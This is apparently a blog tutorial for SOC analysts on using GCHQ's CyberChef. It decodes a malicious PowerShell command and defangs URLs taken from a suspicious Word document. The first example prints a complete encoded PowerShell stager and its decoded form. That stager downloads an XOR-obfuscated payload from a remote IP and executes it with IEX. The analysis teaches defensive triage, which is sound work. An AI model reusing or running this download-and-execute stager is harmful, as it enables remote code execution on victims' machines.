Author Kevin Kipp
A SOC Analysts’ job can sometimes seem overwhelming. There is a myriad of obfuscation techniques that adversaries can use – hashing, encoding, encryption, and compression just to name a few.
How are the defenders supposed to keep up with an ever-changing threat landscape? If you were presented with a secret message such as:
Could you crack the code?
In this blog, we’ll go over an important tool in the SOC Analysts toolbox – CyberChef.
What is CyberChef?
CyberChef is a web-application developed by GCHQ that’s been called the “Cyber Swiss Army Knife”. From the CyberChef Github page:
“CyberChef is a simple, intuitive web app for carrying out all manner of "cyber" operations within a web browser. These operations include simple encoding like XOR or Base64, more complex encryption like AES, DES and Blowfish, creating binary and hexdumps, compression and decompression of data, calculating hashes and checksums, IPv6 and X.509 parsing, changing character encodings, and much more.”
This tool can be downloaded from Github and run on your local machine, or it can be run inside the browser at this link: https://gchq.github.io/CyberChef/
What is CyberChef used for?
CyberChef can be used to: Encode, Decode, Format data, Parse data, Encrypt, Decrypt, Compress data, Extract data, perform arithmetic functions against data, defang data, and many other functions.
How do I get started?
From there, you’ll see 4 sections:
Operations on the left side – These are how the manipulations you want to perform on the data.
Recipe in the middle – These are the instructions telling Cyberchef what to do with the data.
Input section on the top right side – This is the data you provide that you’re manipulating.
Output section on the bottom right side – This is the result of the Input + Recipe functions
In order to use CyberChef for the first time, it’s easiest to know how you want to manipulate the data first, but you also need sample data for the input.
The next few sections will guide you through the process.
Grab your chef hat and let’s get cooking!
Example 1:
You receive an alert from your EDR that a single PC has tried to run a malicious Powershell script.
The attempt was blocked, but let’s analyze the script using Cyberchef.
Reviewing the alert, you can see the following command from your Powershell logs:
“powershell.exe -NoP -sta -NonI -W Hidden -Enc
JABXAEMAPQBOAGUAdwAtAE8AYgBqAEUAYwBUACAAUwB5AFMAVABlAE0ALgBOAEUAVAAuAFcAZQBiAEMAbABpAEUATgB0ADsAJAB1AD0AJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACAAVwBPAFcANgA0ADsAIABUAHIAaQBkAGUAbgB0AC8ANwAuADAAOwAgAHIAdgA6ADEAMQAuADAAKQAgAGwAaQBrAGUAIABHAGUAYwBrAG8AJwA7ACQAVwBDAC4ASABlAEEARABlAFIAUwAuAEEARABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAVwBjAC4AUAByAG8AeABZACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAVAAuAFcARQBCAFIAZQBRAFUARQBzAHQAXQA6ADoARABFAEYAQQB1AEwAdABXAGUAYgBQAHIAbwBYAHkAOwAkAHcAYwAuAFAAUgBPAHgAWQAuAEMAcgBFAGQAZQBuAFQAaQBhAGwAUwAgAD0AIABbAFMAeQBzAFQAZQBtAC4ATgBFAHQALgBDAFIAZQBkAGUATgBUAEkAQQBsAEMAQQBjAEgARQBdADoAOgBEAGUARgBBAFUATABUAE4AZQB0AFcATwByAEsAQwByAGUAZABFAE4AVABpAEEAbABzADsAJABLAD0AJwBJAE0ALQBTACYAZgBBADkAWAB1AHsAWwApAHwAdwBkAFcASgBoAEMAKwAhAE4AfgB2AHEAXwAxADIATAB0AHkAJwA7ACQAaQA9ADAAOwBbAEMASABhAFIAWwBdAF0AJABCAD0AKABbAGMASABhAFIAWwBdAF0AKAAkAHcAYwAuAEQATwB3AE4ATABPAGEARABTAHQAcgBpAE4AZwAoACIAaAB0AHQAcAA6AC8ALwA5ADgALgAxADAAMwAuADEAMAAzAC4AMQA3ADAAOgA3ADQANAAzAC8AaQBuAGQAZQB4AC4AYQBzAHAAIgApACkAKQB8ACUAewAkAF8ALQBCAFgAbwBSACQASwBbACQASQArACsAJQAkAGsALgBMAEUAbgBHAFQASABdAH0AOwBJAEUAWAAgACgAJABCAC0AagBPAEkAbgAnACcAKQA=”
Let’s break this down:
Powershell.exe tells Windows to open and use the Powershell language to interpret the command.
-NoP tells the Powershell process to not use a Profile. Profiles are used in Powershell to set environment variables such as window color, text font and color, and other options.
-sta tells Powershell to use “Single Thread Apartment” or only dedicate one memory thread for this process. These can be changed to make Powershell multi-threaded, or faster.
-NonI tells Powershell to use a non-interactive window, typically to prevent the user from closing the process.
-W Hidden tells Powershell to use a hidden window, again this is typically used to hide malicious actions from the user.
The next part looks like junk, but this is actually Base64 encoded commands, and the reason we need help from CyberChef.
Copy the entire command starting from “JABX” and ending with “AKQA=” and paste it into the Input section of CyberChef:
In order to decode the command, we’ll need to tell CyberChef to decode the Base64 data.
Type “base” in the search box on the left, and drag “From Base64” into the Recipe section:
As you can see, the Output on the bottom right is better, but still not human-readable.
Copy the text in the Output section and paste it into the Input section.
Drag the “From Base64” recipe back into the Operations section on the left side.
Using the “Find/Replace” function, we can clean up the data.
Drag the “Find/Replace” function into the Recipe section.
We want to remove all the extra periods from the Input.
Change the value in the “Find” section from “Regex” to “Simple String”, enter a period into the “Find” section and keep the “Replace” section blank.
It should look like this:
If we separate out the commands into new lines, we can see the following:
$WC=New-ObjEcT SySTeMNETWebCliENt;
$u='Mozilla/50 (Windows NT 61; WOW64; Trident/70; rv:110) like Gecko';
$WCHeADeRSADd('User-Agent',$u);
$WcProxY = [SystemNeTWEBReQUEst]::DEFAuLtWebProXy;
$wcPROxYCrEdenTialS = [SysTemNEtCRedeNTIAlCAcHE]::DeFAULTNetWOrKCredENTiAls;
$K='IM-S&fA9Xu{[)|wdWJhC+!N~vq_12Lty';
$i=0;[CHaR[]]$B=([cHaR[]]($wcDOwNLOaDStriNg("hxxp://90103103171:7443/indexasp")))
|%{$_-BXoR$K[$I++%$kLEnGTH]};IEX ($B-jOIn'')
This malicious script will perform the following actions:
Create a .NET web client
Spoof a user agent string
Use the default web proxy
Use default network credentials
Download a malicious payload
Execute the payload
This is an example of threat actors using legitimate tools (Powershell, Base64 encoding) in an illegitimate way. Blue Teamers need to find creative ways to unmask these types of attacks.
CyberChef makes it easy to take an encoded command, and make it human readable.
Let’s try another example.
Example 2:
You receive a password-protected Word document in an email, and you want to analyze it to make sure there are no malicious URLs in it.
The steps to this recipe are as follows:
Unzip the document. .DOCX files are actually compressed ZIP files with XML formatting.
By telling CyberChef to unzip the file, we can see the contents on the inside.
Extract URL’s from the document.
Add filters to remove legitimate URL’s from the document.
Since the format of this document is XML, it will include information about the XML schema that is used. We don’t need this information, so we can filter it out.
Lastly, we don’t want to accidentally click on any malicious URLs, so we choose the “Defang URL” option with all the options checked.
1st - upload the document to CyberChef by either dragging it into the Input section, or clicking on this icon:
4th, 5th, 6th, and 7th – add “Filter” operations with “invert conditions” checked to filter out any legit URLs.
These are written in Regex syntax, so be sure to add “\” as an escape character before a period, since a period will match any character in Regex (wildcard).
8th – Add the “Defang URL” operation at the bottom to prevent accidentally clicking the malicious URLs.
Voila! We’re left with:
hxxps[://]www[.]evil[.]ru
hxxps[://]www[.]not-really-microsoft[.]ga
hxxps[://]www[.]t0tally-leg1t[.]tk
In this example, we were able to decode and defang URLs from a password protected document before clicking them.
Summary
In these exercises, we were able to shine a light on the ways that attackers hide their motivations, and how defenders can use any available tools they have to thwart the bad guys.
CyberChef is a great open-source tool that can be used by anyone for a number of use-cases.
If you’re interested in learning more, here are some resources to check out:
About the Author: Kevin Kipp is a Cyber Security Analyst II at Tokio Marine HCC. He currently holds multiple industry certifications, serves on the GIAC Advisory Board, volunteers for CSNP, and is a lifelong learner.